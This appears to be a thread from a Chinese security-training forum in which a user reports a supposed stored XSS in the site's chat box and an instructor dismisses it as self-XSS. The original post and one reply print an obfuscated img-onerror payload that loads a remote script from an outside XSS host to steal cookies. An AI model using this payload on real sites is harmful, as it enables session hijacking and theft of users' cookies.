社区存在存储型xss

lunnam   ·   发表于 2021-06-17 22:12:49   ·   问题反馈求助区

之前风哥上课说反射型xss不算,但在聊天框框里面输入
<img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHMuc2IvckNRMCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs= onerror=eval(atob(this.id))>
同样可以获取到聊天对象的cookie,该漏洞属于存储型xss

打赏我,让我更有动力~

5 Reply   |  Until 2个月前 | 611 View

Track-聂风
发表于 4个月前

同学你打到的是自己的Cookie,并不是聊天对象的Cookie.

评论列表

  • 加载数据中...

编写评论内容

山屿云
发表于 4个月前

哈哈哈

评论列表

  • 加载数据中...

编写评论内容

spider
发表于 4个月前

自己打自己

评论列表

  • 加载数据中...

编写评论内容

1399546819
发表于 4个月前

<img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHMuc2IvckNRMCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs= onerror=eval(atob(this.id))>

评论列表

  • 加载数据中...

编写评论内容

二福
发表于 2个月前

哈哈

评论列表

  • 加载数据中...

编写评论内容
LoginCan Publish Content
返回顶部 投诉反馈

掌控者 © 2016 - 2021. All Rights Reserved. 掌控者

Powered by 掌控者